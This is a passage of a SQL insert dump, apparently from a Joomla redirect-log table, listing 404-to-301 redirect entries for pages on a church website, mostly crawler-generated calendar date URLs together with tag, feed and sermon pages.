(2496, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/21/-', NULL, '', '', 1, 0, '2017-01-21 18:59:05', '0000-00-00 00:00:00', 301),
(2497, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/3/-', NULL, '', '', 1, 0, '2017-01-21 18:59:16', '0000-00-00 00:00:00', 301),
(2498, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/6/-', NULL, '', '', 1, 0, '2017-01-21 18:59:48', '0000-00-00 00:00:00', 301),
(2499, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/16/-', NULL, '', '', 1, 0, '2017-01-21 19:00:09', '0000-00-00 00:00:00', 301),
(2500, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/12/-', NULL, '', '', 1, 0, '2017-01-21 19:00:30', '0000-00-00 00:00:00', 301),
(2501, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/2/-', NULL, '', '', 1, 0, '2017-01-21 19:00:41', '0000-00-00 00:00:00', 301),
(2502, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/27/-', NULL, '', '', 1, 0, '2017-01-21 19:00:50', '0000-00-00 00:00:00', 301),
(2503, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/29/-', NULL, '', '', 1, 0, '2017-01-21 19:01:00', '0000-00-00 00:00:00', 301),
(2504, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/23/-', NULL, '', '', 1, 0, '2017-01-21 19:01:10', '0000-00-00 00:00:00', 301),
(2505, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/23/-', NULL, '', '', 1, 0, '2017-01-21 19:01:20', '0000-00-00 00:00:00', 301),
(2506, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/1/-', NULL, '', '', 1, 0, '2017-01-21 19:01:37', '0000-00-00 00:00:00', 301),
(2507, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/20/-', NULL, '', '', 1, 0, '2017-01-21 19:01:53', '0000-00-00 00:00:00', 301),
(2508, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/19/-', NULL, '', '', 1, 0, '2017-01-21 19:02:10', '0000-00-00 00:00:00', 301),
(2509, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/7/-', NULL, '', '', 1, 0, '2017-01-21 19:02:27', '0000-00-00 00:00:00', 301),
(2510, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/17/-', NULL, '', '', 1, 0, '2017-01-21 19:02:48', '0000-00-00 00:00:00', 301),
(2511, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-joomla/itemlist/tag/CSS3', NULL, '', '', 1, 0, '2017-01-21 19:54:32', '0000-00-00 00:00:00', 301),
(2512, 'http://www.lifeoasisinternationalchurch.org/template-info/media-outreach', NULL, '', '', 21, 0, '2017-01-21 20:06:31', '0000-00-00 00:00:00', 301),
(2513, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=CSS3&Itemid=775', NULL, '', '', 1, 0, '2017-01-21 21:06:48', '0000-00-00 00:00:00', 301),
(2514, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/4', NULL, '', '', 2, 0, '2017-01-21 22:40:46', '0000-00-00 00:00:00', 301),
(2515, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=HTML5', NULL, '', '', 1, 0, '2017-01-21 23:38:22', '0000-00-00 00:00:00', 301),
(2516, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=item&id=4:inspiration-comes-from-within&Itemid=768', NULL, '', '', 1, 0, '2017-01-21 23:40:57', '0000-00-00 00:00:00', 301),
(2517, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=Joomla&Itemid=775', NULL, '', '', 1, 0, '2017-01-22 02:09:56', '0000-00-00 00:00:00', 301),
(2518, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/2-building-a-bilblical-relationship-with-the-word-of-god-2', NULL, '', '', 23, 0, '2017-01-22 03:16:03', '0000-00-00 00:00:00', 301),
(2519, 'http://www.lifeoasisinternationalchurch.org/gobc-2014-online-registration', NULL, '', '', 5, 0, '2017-01-22 03:59:51', '0000-00-00 00:00:00', 301),
(2520, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=church&Itemid=626', NULL, '', '', 1, 0, '2017-01-22 04:41:30', '0000-00-00 00:00:00', 301),
(2521, 'http://www.lifeoasisinternationalchurch.org/index.php/221-2016-day-4', NULL, '', '', 6, 0, '2017-01-22 06:29:18', '0000-00-00 00:00:00', 301),
(2522, 'http://www.lifeoasisinternationalchurch.org/index.php/189-2015-day-12', NULL, '', '', 9, 0, '2017-01-22 07:29:14', '0000-00-00 00:00:00', 301),
(2523, 'http://ljmti.lifeoasisinternationalchurch.org/component/content/32-sermons?layout=blog&Itemid=435&format=feed&type=rss', NULL, '', '', 4, 0, '2017-01-22 07:31:05', '0000-00-00 00:00:00', 301),
(2524, 'http://ljmti.lifeoasisinternationalchurch.org/component/content/32-sermons?layout=blog&Itemid=435&format=feed&type=atom', NULL, '', '', 4, 0, '2017-01-22 07:31:27', '0000-00-00 00:00:00', 301),
(2525, 'http://ljmti.lifeoasisinternationalchurch.org/component/content/32-sermons?layout=blog&Itemid=435&start=5', NULL, '', '', 1, 0, '2017-01-22 07:31:47', '0000-00-00 00:00:00', 301),
(2526, 'http://ljmti.lifeoasisinternationalchurch.org/component/content/32-sermons?Itemid=435&format=feed&type=rss', NULL, '', '', 4, 0, '2017-01-22 07:33:45', '0000-00-00 00:00:00', 301),
(2527, 'http://ljmti.lifeoasisinternationalchurch.org/component/content/32-sermons?Itemid=435&format=feed&type=atom', NULL, '', '', 4, 0, '2017-01-22 07:34:24', '0000-00-00 00:00:00', 301),
(2528, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=responsive&Itemid=626', NULL, '', '', 1, 0, '2017-01-22 08:28:50', '0000-00-00 00:00:00', 301),
(2529, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/20-prayer-a-fasting-day-11', NULL, '', '', 3, 0, '2017-01-22 09:00:05', '0000-00-00 00:00:00', 301),
(2530, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=CSS3', NULL, '', '', 1, 0, '2017-01-22 09:44:53', '0000-00-00 00:00:00', 301),
(2531, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/9/-', NULL, '', '', 1, 0, '2017-01-22 10:33:02', '0000-00-00 00:00:00', 301),
(2532, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/31/-', NULL, '', '', 1, 0, '2017-01-22 10:33:18', '0000-00-00 00:00:00', 301),
(2533, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/8/-', NULL, '', '', 1, 0, '2017-01-22 10:33:41', '0000-00-00 00:00:00', 301),
(2534, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/8/-', NULL, '', '', 1, 0, '2017-01-22 10:34:06', '0000-00-00 00:00:00', 301),
(2535, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/19/-', NULL, '', '', 1, 0, '2017-01-22 10:34:29', '0000-00-00 00:00:00', 301),
(2536, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/7/-', NULL, '', '', 1, 0, '2017-01-22 10:34:52', '0000-00-00 00:00:00', 301),
(2537, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/2/-', NULL, '', '', 1, 0, '2017-01-22 10:35:15', '0000-00-00 00:00:00', 301),
(2538, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/26/-', NULL, '', '', 1, 0, '2017-01-22 10:35:55', '0000-00-00 00:00:00', 301),
(2539, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/9/-', NULL, '', '', 1, 0, '2017-01-22 10:36:17', '0000-00-00 00:00:00', 301),
(2540, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/18/-', NULL, '', '', 1, 0, '2017-01-22 10:36:37', '0000-00-00 00:00:00', 301),
(2541, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/1/-', NULL, '', '', 1, 0, '2017-01-22 10:37:00', '0000-00-00 00:00:00', 301),
(2542, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/10/-', NULL, '', '', 1, 0, '2017-01-22 10:37:18', '0000-00-00 00:00:00', 301),
(2543, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/27/-', NULL, '', '', 1, 0, '2017-01-22 10:40:50', '0000-00-00 00:00:00', 301),
(2544, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/15/-', NULL, '', '', 1, 0, '2017-01-22 10:43:49', '0000-00-00 00:00:00', 301),
(2545, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/18/-', NULL, '', '', 1, 0, '2017-01-22 10:47:33', '0000-00-00 00:00:00', 301),
(2546, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/21/-', NULL, '', '', 1, 0, '2017-01-22 10:51:36', '0000-00-00 00:00:00', 301),
(2547, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/23/-', NULL, '', '', 1, 0, '2017-01-22 10:55:05', '0000-00-00 00:00:00', 301),
(2548, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/20/-', NULL, '', '', 1, 0, '2017-01-22 10:58:58', '0000-00-00 00:00:00', 301),
(2549, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=Joomla&Itemid=626', NULL, '', '', 1, 0, '2017-01-22 11:01:10', '0000-00-00 00:00:00', 301),
(2550, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/7/-', NULL, '', '', 1, 0, '2017-01-22 11:02:40', '0000-00-00 00:00:00', 301),
(2551, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/23/-', NULL, '', '', 1, 0, '2017-01-22 11:06:28', '0000-00-00 00:00:00', 301),
(2552, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/22/-', NULL, '', '', 1, 0, '2017-01-22 11:10:12', '0000-00-00 00:00:00', 301),
(2553, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/13/-', NULL, '', '', 1, 0, '2017-01-22 11:14:02', '0000-00-00 00:00:00', 301),
(2554, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/4/-', NULL, '', '', 1, 0, '2017-01-22 11:17:51', '0000-00-00 00:00:00', 301),
(2555, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/7/-', NULL, '', '', 1, 0, '2017-01-22 11:21:36', '0000-00-00 00:00:00', 301),
(2556, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/15/-', NULL, '', '', 1, 0, '2017-01-22 11:25:34', '0000-00-00 00:00:00', 301),
(2557, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/6/-', NULL, '', '', 1, 0, '2017-01-22 11:29:22', '0000-00-00 00:00:00', 301),
(2558, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/18/-', NULL, '', '', 1, 0, '2017-01-22 11:33:00', '0000-00-00 00:00:00', 301),
(2559, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/29/-', NULL, '', '', 1, 0, '2017-01-22 11:38:08', '0000-00-00 00:00:00', 301),
(2560, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/12/-', NULL, '', '', 1, 0, '2017-01-22 11:41:31', '0000-00-00 00:00:00', 301),
(2561, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/5/-', NULL, '', '', 1, 0, '2017-01-22 11:44:26', '0000-00-00 00:00:00', 301),
(2562, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/17/-', NULL, '', '', 1, 0, '2017-01-22 11:48:09', '0000-00-00 00:00:00', 301),
(2563, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/14/-', NULL, '', '', 1, 0, '2017-01-22 11:51:52', '0000-00-00 00:00:00', 301),
(2564, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/18/-', NULL, '', '', 1, 0, '2017-01-22 11:55:52', '0000-00-00 00:00:00', 301),
(2565, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/11/-', NULL, '', '', 1, 0, '2017-01-22 11:59:44', '0000-00-00 00:00:00', 301),
(2566, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/24/-', NULL, '', '', 1, 0, '2017-01-22 12:03:26', '0000-00-00 00:00:00', 301),
(2567, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/7/-', NULL, '', '', 1, 0, '2017-01-22 12:07:04', '0000-00-00 00:00:00', 301),
(2568, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=envato&Itemid=775', NULL, '', '', 1, 0, '2017-01-22 12:16:24', '0000-00-00 00:00:00', 301),
(2569, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=WordPress&Itemid=626', NULL, '', '', 1, 0, '2017-01-22 14:47:45', '0000-00-00 00:00:00', 301),
(2570, 'http://www.lifeoasisinternationalchurch.org/component/content/category/17-fp-headlines-lists', NULL, '', '', 3, 0, '2017-01-22 14:56:02', '0000-00-00 00:00:00', 301),
(2571, 'http://lifeoasisinternationalchurch.org/testimonies/day.listevents/2012/08/04/15', NULL, '', '', 2, 0, '2017-01-22 15:02:19', '0000-00-00 00:00:00', 301),
(2572, 'http://lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=62&Itemid=358', NULL, '', '', 3, 0, '2017-01-22 15:02:19', '0000-00-00 00:00:00', 301),
(2573, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/20-prayer-a-fasting-day-11', NULL, '', '', 5, 0, '2017-01-22 16:04:18', '0000-00-00 00:00:00', 301),
(2574, 'http://www.lifeoasisinternationalchurch.org/component/content/article/2-uncategorised/60-destinytv', NULL, '', '', 4, 0, '2017-01-22 16:11:20', '0000-00-00 00:00:00', 301),
(2575, 'http://www.lifeoasisinternationalchurch.org/resources/salvation/18-loic/50-young-achievers', NULL, '', '', 9, 0, '2017-01-22 16:43:18', '0000-00-00 00:00:00', 301),
(2576, 'http://ljmti.lifeoasisinternationalchurch.org/digital/icon-fonts', NULL, '', '', 3, 0, '2017-01-22 16:57:36', '0000-00-00 00:00:00', 301),
(2577, 'http://lifeoasisinternationalchurch.org/resou', NULL, '', '', 10, 0, '2017-01-22 17:00:09', '0000-00-00 00:00:00', 301),
(2578, 'http://lifeoasisinternationalchurch.org/index.php/template-info-2/dream-centre-ordained-pastors', NULL, '', '', 9, 0, '2017-01-22 17:28:42', '0000-00-00 00:00:00', 301),
(2579, 'http://ljmti.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/CSS3', NULL, '', '', 1, 0, '2017-01-22 18:04:34', '0000-00-00 00:00:00', 301),
(2580, 'http://www.lifeoasisinternationalchurch.org/index.php/component/content/category/17-fp-headlines-lists', NULL, '', '', 1, 0, '2017-01-22 18:26:06', '0000-00-00 00:00:00', 301),
(2581, 'http://www.lifeoasisinternationalchurch.org/index.php/component/content/article/17-fp-headlines-lists/55-kb-zp', NULL, '', '', 1, 0, '2017-01-22 18:40:33', '0000-00-00 00:00:00', 301),
(2582, 'http://lifeoasisinternationalchurch.org/ljmti/home/practical-section', NULL, '', '', 2, 0, '2017-01-22 19:44:23', '0000-00-00 00:00:00', 301),
(2583, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=WordPress&Itemid=768', NULL, '', '', 1, 0, '2017-01-22 21:06:41', '0000-00-00 00:00:00', 301),
(2584, 'http://www.lifeoasisinternationalchurch.org/template-info-2/the-church-2/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-01-22 21:11:07', '0000-00-00 00:00:00', 301),
(2585, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/5/-', NULL, '', '', 1, 0, '2017-01-23 01:07:59', '0000-00-00 00:00:00', 301),
(2586, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/9/-', NULL, '', '', 1, 0, '2017-01-23 01:08:06', '0000-00-00 00:00:00', 301),
(2587, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/20/-', NULL, '', '', 1, 0, '2017-01-23 01:08:23', '0000-00-00 00:00:00', 301),
(2588, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/3/-', NULL, '', '', 1, 0, '2017-01-23 01:08:31', '0000-00-00 00:00:00', 301),
(2589, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/22/-', NULL, '', '', 1, 0, '2017-01-23 01:08:39', '0000-00-00 00:00:00', 301),
(2590, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/14/-', NULL, '', '', 1, 0, '2017-01-23 01:08:47', '0000-00-00 00:00:00', 301),
(2591, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/30/-', NULL, '', '', 1, 0, '2017-01-23 01:08:55', '0000-00-00 00:00:00', 301),
(2592, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/13/-', NULL, '', '', 1, 0, '2017-01-23 01:09:03', '0000-00-00 00:00:00', 301),
(2593, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/3/-', NULL, '', '', 1, 0, '2017-01-23 01:09:11', '0000-00-00 00:00:00', 301),
(2594, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/31/-', NULL, '', '', 1, 0, '2017-01-23 01:09:19', '0000-00-00 00:00:00', 301),
(2595, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/5/-', NULL, '', '', 1, 0, '2017-01-23 01:09:27', '0000-00-00 00:00:00', 301),
(2596, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/26/-', NULL, '', '', 1, 0, '2017-01-23 01:09:35', '0000-00-00 00:00:00', 301),
(2597, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/11/-', NULL, '', '', 1, 0, '2017-01-23 01:09:43', '0000-00-00 00:00:00', 301),
(2598, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/17/-', NULL, '', '', 1, 0, '2017-01-23 01:09:51', '0000-00-00 00:00:00', 301),
(2599, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/19/-', NULL, '', '', 1, 0, '2017-01-23 01:09:59', '0000-00-00 00:00:00', 301),
(2600, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/3/-', NULL, '', '', 1, 0, '2017-01-23 01:10:08', '0000-00-00 00:00:00', 301),
(2601, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/2/-', NULL, '', '', 1, 0, '2017-01-23 01:10:16', '0000-00-00 00:00:00', 301),
(2602, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/1/-', NULL, '', '', 1, 0, '2017-01-23 01:10:24', '0000-00-00 00:00:00', 301),
(2603, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/11/-', NULL, '', '', 1, 0, '2017-01-23 01:10:32', '0000-00-00 00:00:00', 301),
(2604, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/8/-', NULL, '', '', 1, 0, '2017-01-23 01:10:40', '0000-00-00 00:00:00', 301),
(2605, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/25/-', NULL, '', '', 1, 0, '2017-01-23 01:10:48', '0000-00-00 00:00:00', 301),
(2606, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/9/-', NULL, '', '', 1, 0, '2017-01-23 01:10:56', '0000-00-00 00:00:00', 301),
(2607, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/20/-', NULL, '', '', 1, 0, '2017-01-23 01:11:04', '0000-00-00 00:00:00', 301),
(2608, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/18/-', NULL, '', '', 1, 0, '2017-01-23 01:11:12', '0000-00-00 00:00:00', 301),
(2609, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/26/-', NULL, '', '', 1, 0, '2017-01-23 01:11:20', '0000-00-00 00:00:00', 301),
(2610, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/8/-', NULL, '', '', 1, 0, '2017-01-23 01:11:28', '0000-00-00 00:00:00', 301),
(2611, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/15/-', NULL, '', '', 1, 0, '2017-01-23 01:11:37', '0000-00-00 00:00:00', 301),
(2612, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/20/-', NULL, '', '', 1, 0, '2017-01-23 01:11:45', '0000-00-00 00:00:00', 301),
(2613, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/12/-', NULL, '', '', 1, 0, '2017-01-23 01:11:53', '0000-00-00 00:00:00', 301),
(2614, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/8/-', NULL, '', '', 1, 0, '2017-01-23 01:12:01', '0000-00-00 00:00:00', 301),
(2615, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/28/-', NULL, '', '', 1, 0, '2017-01-23 01:12:09', '0000-00-00 00:00:00', 301),
(2616, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/24/-', NULL, '', '', 1, 0, '2017-01-23 01:12:17', '0000-00-00 00:00:00', 301),
(2617, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/19/-', NULL, '', '', 1, 0, '2017-01-23 01:12:25', '0000-00-00 00:00:00', 301),
(2618, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/7/-', NULL, '', '', 1, 0, '2017-01-23 01:12:34', '0000-00-00 00:00:00', 301),
(2619, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/16/-', NULL, '', '', 1, 0, '2017-01-23 01:12:42', '0000-00-00 00:00:00', 301),
(2620, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/27/-', NULL, '', '', 1, 0, '2017-01-23 01:12:52', '0000-00-00 00:00:00', 301),
(2621, 'http://lifeoasisinternationalchurch.org/index.php/251-day-16-of-21-days-fasting-and-prayer-october', NULL, '', '', 1, 0, '2017-01-23 03:00:31', '0000-00-00 00:00:00', 301),
(2622, 'http://www.lifeoasisinternationalchurch.org/prayer/103-prayer-focus-for-day-12', NULL, '', '', 2, 0, '2017-01-23 03:01:32', '0000-00-00 00:00:00', 301),
(2623, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=CSS3&Itemid=625', NULL, '', '', 1, 0, '2017-01-23 03:26:15', '0000-00-00 00:00:00', 301),
(2624, 'http://lifeoasisinternationalchurch.org/template-info-2/dream-centre-ordained-pastors', NULL, '', '', 38, 0, '2017-01-23 05:02:50', '0000-00-00 00:00:00', 301),
(2625, 'http://www.lifeoasisinternationalchurch.org/index.php/267-day-7-of-21-days-fasting-and-prayer-november-2', NULL, '', '', 10, 0, '2017-01-23 05:27:07', '0000-00-00 00:00:00', 301),
(2626, 'http://www.lifeoasisinternationalchurch.org/index.php/275-day-15-of-21-days-fasting-and-prayer-november', NULL, '', '', 11, 0, '2017-01-23 05:59:09', '0000-00-00 00:00:00', 301),
(2627, 'http://ljmti.lifeoasisinternationalchurch.org/sitemap.xml', NULL, '', '', 1, 0, '2017-01-23 06:01:07', '0000-00-00 00:00:00', 301),
(2628, 'http://www.lifeoasisinternationalchurch.org/index.php/263-day-3-of-21-days-fasting-and-prayer-november', NULL, '', '', 8, 0, '2017-01-23 06:02:50', '0000-00-00 00:00:00', 301),
(2629, 'http://www.lifeoasisinternationalchurch.org/online-giving/', NULL, '', '', 2, 0, '2017-01-23 06:03:25', '0000-00-00 00:00:00', 301),
(2630, 'http://lifeoasisinternationalchurch.org/component/content/category/16-fp-tabs', NULL, '', '', 1, 0, '2017-01-23 06:33:22', '0000-00-00 00:00:00', 301),
(2631, 'http://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/4', NULL, '', '', 1, 0, '2017-01-23 06:33:28', '0000-00-00 00:00:00', 301),
(2632, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=Lighthouse&Itemid=775', NULL, '', '', 1, 0, '2017-01-23 07:12:59', '0000-00-00 00:00:00', 301),
(2633, 'http://www.lifeoasisinternationalchurch.org/index.php/142-day-16', NULL, '', '', 4, 0, '2017-01-23 07:53:34', '0000-00-00 00:00:00', 301),
(2634, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=envato', NULL, '', '', 1, 0, '2017-01-23 08:28:45', '0000-00-00 00:00:00', 301),
(2635, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=52&Itemid=294', NULL, '', '', 1, 0, '2017-01-23 11:23:17', '0000-00-00 00:00:00', 301),
(2636, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=HTML5&Itemid=626', NULL, '', '', 1, 0, '2017-01-23 12:16:11', '0000-00-00 00:00:00', 301),
(2637, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=envato&Itemid=626', NULL, '', '', 1, 0, '2017-01-23 13:31:53', '0000-00-00 00:00:00', 301),
(2638, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/27/-', NULL, '', '', 1, 0, '2017-01-23 14:37:58', '0000-00-00 00:00:00', 301),
(2639, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/23/-', NULL, '', '', 1, 0, '2017-01-23 14:38:05', '0000-00-00 00:00:00', 301),
(2640, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/28/-', NULL, '', '', 1, 0, '2017-01-23 14:38:13', '0000-00-00 00:00:00', 301),
(2641, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/6/-', NULL, '', '', 1, 0, '2017-01-23 14:38:21', '0000-00-00 00:00:00', 301),
(2642, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/3/-', NULL, '', '', 1, 0, '2017-01-23 14:38:29', '0000-00-00 00:00:00', 301),
(2643, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/13/-', NULL, '', '', 1, 0, '2017-01-23 14:38:37', '0000-00-00 00:00:00', 301),
(2644, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/20/-', NULL, '', '', 1, 0, '2017-01-23 14:38:45', '0000-00-00 00:00:00', 301),
(2645, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/23/-', NULL, '', '', 1, 0, '2017-01-23 14:39:00', '0000-00-00 00:00:00', 301),
(2646, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/24/-', NULL, '', '', 1, 0, '2017-01-23 14:39:07', '0000-00-00 00:00:00', 301),
(2647, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/2/-', NULL, '', '', 1, 0, '2017-01-23 14:39:15', '0000-00-00 00:00:00', 301),
(2648, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/14/-', NULL, '', '', 1, 0, '2017-01-23 14:39:23', '0000-00-00 00:00:00', 301),
(2649, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/8/-', NULL, '', '', 1, 0, '2017-01-23 14:39:38', '0000-00-00 00:00:00', 301),
(2650, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/15/-', NULL, '', '', 1, 0, '2017-01-23 14:39:45', '0000-00-00 00:00:00', 301),
